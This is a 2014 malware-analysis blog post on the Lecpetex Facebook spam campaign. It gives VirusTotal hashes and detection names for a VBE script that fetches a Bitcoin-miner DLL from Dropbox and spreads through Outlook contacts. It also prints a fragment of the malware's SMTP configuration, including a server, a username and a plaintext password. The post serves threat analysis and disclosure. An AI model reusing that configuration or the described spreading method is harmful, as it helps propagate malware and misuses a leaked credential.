[en] Virus Facebook hahaha (Lecpetex)

Some thread about a "Virus Facebok hahaha" thoses last days.
Seems some people go a private message with a zip file.

 

VirusFacebookhahaha

I dont have the Main zip sent by Facebook, but someone sent me an other zip related to this Virus.
it's an interresting VBE script :

The VBE download some zip from dropbox and create a Temp directory to store the files.
it registed a DLL that is Bitcoin Miner : https://www.virustotal.com/fr/file/a775ad50757a3de35a3445fb6594cb4b5bc5ec4db34d63ec6b8bf852b6472d0b/analysis/

SHA256: a775ad50757a3de35a3445fb6594cb4b5bc5ec4db34d63ec6b8bf852b6472d0b
Nom du fichier : xml.exfffe
Ratio de détection : 10 / 53
Date d'analyse : 2014-06-10 22:16:20 UTC (il y a 29 minutes)

Ad-Aware Gen:Variant.Graftor.143340 20140610
AntiVir TR/Dropper.Gen 20140610
Avast Win32:Miner-B [PUP] 20140610
BitDefender Gen:Variant.Graftor.143340 20140610
ESET-NOD32 a variant of Win32/Injector.BEIE 20140610
Emsisoft Gen:Variant.Graftor.143340 (B) 20140610
F-Secure Gen:Variant.Graftor.143340 20140610
GData Gen:Variant.Graftor.143340 20140610
MicroWorld-eScan Gen:Variant.Graftor.143340 20140610
Symantec Suspicious.AD 20140610

Also the VBE is able using external utilities like ClickYes (maybe modified : https://www.virustotal.com/fr/file/618232771f97ded754fe06e0be4f47b8c1b13ca9030ef01774176791f354447b/analysis/ ) to get the Outlook contact list and spread by email.
To do that, it use a greek SMP Server :

.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "mailgate.otenet.gr"
.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 587
.Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False
.Item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "[email protected]"
.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "nat1978#"

Interresting !

I will try to get the zip file sent on Facebook, if different, will edit this thread if so.

EDIT - June 12

Facebook Malicious Spam example :

Virus #1Virus #2

Also, Someone sent me this article (in French) : http://forum.security-x.fr/securite-generale/vague-de-spams-malicieux-sur-facebook/
There is a sample, but a bit old : First submission 2014-05-28 15:43:35 UTC (il y a 2 semaines) => https://www.virustotal.com/fr/file/4bcb865060ec401b2ed1d20422ed00488e04884f9abd573ca9d41d666b1fe7fc/analysis/1402529232/
The Jar is trying to download zip at dropbox (maybe the same vbe script was there) but Dropbox has already removed all.

Seems also that Malwarebytes has already blog about it : http://blog.malwarebytes.org/security-threat/2014/03/malicious-messages-foray-facebook/

VirusFacebook_hahah

EDIT - June 23

Another article about this threat : http://thegoldenmessenger.blogspot.de/2014/06/malware-spread-over-facebook.html
According to the article, Microsoft detect the Jar with the name Java/Carastavona.E

EDIT - July 9 - Facebook takes down Lecpetex Botnet

Facebook takes down Lecpetex Botnet - more informations : https://www.facebook.com/notes/protect-the-graph/taking-down-the-lecpetex-botnet/1477464749160338

Cet article est sous licence Creative Commons BY-NC-SA.
Vous êtes autorisé à partager et modifier cet article, à condition de créditer le site ainsi que la licence, d'utiliser la même licence si vous modifiez l'oeuvre et de ne pas en faire d'utilisation commerciale.

Trouver la solution sur le forum d'aide

Vous êtes arrivé au terme de l'article [en] Virus Facebook hahaha (Lecpetex) mais vous n'avez pas trouvé la solution à votre problème...

Suivez ces articles du forum pour trouver une réponse :
Sinon créez votre propre demande pour obtenir de l'aide gratuite.
Plus de détails : Comment obtenir de l'aide sur le forum